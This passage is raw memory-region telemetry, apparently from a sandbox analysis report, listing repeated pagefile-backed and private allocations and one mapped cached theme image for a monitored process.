0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5193 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5194 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5195 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5196 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5197 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5198 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5199 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5200 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5201 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5202 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5203 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5204 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5205 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5206 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5207 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5208 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5209 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5210 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5211 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5212 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 5213 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 5214 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5215 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5216 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 5217 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 5218 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5219 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5220 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5221 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5222 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5223 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5224 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5225 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5226 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5227 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5228 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5229 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 5230 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 5231 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5232 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5233 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5234 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5235 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5236 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5237 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5238 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5239 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5240 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5241 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5242 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5243 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5244 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5245 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5246 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5247 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5248 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5249 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5250 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5251 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5252 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5253 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5254 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5255 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5256 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5257 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5258 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5259 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5260 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5261 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5262 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5263 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5264 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5265 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5266 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5267 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5268 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5269 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5270 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5271 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5272 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5273 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5274 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5275 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5276 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5277 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5278 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5279 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5280 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5281 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5282 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5283 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5284 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5285 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5286 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5287 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5288 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5289 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5290 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5291 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 5292 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 5293 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5294 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5295 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5296 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5297 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5298 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5299 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5300 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5301 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5302 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5303 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5304 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5305 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5306 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5307 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5308 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5309 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5310 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5311 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5312 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5313 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5314 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5315 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5316 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5317 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5318 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5319 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5320 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5321 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5322 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5323 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5324 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5325 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5326 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5327 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5328 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5329 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5330 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 5331 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 5332 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5333 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5334 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5335 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5336 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 5337 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 5338 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5339 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5340 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5341 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 5342 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 5343 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5344 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5345 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5346 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5347 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5348 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5349 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5350 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5351 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5352 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5353 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5354 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5355 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5356 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5357 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5358 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5359 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5360 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5361 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5362 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 5363 start_va = 0x54a0000 end_va = 0x5509fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cachedimage_1440_900_pos4.jpg" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\CachedImage_1440_900_POS4.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\windows\\themes\\cachedfiles\\cachedimage_1440_900_pos4.jpg") Region: id = 5364 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5365 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5366 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5367 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5368 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5369 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5370 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5371 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5372 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5373 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5374 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 5375 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 5376 start_va = 0x3d50000 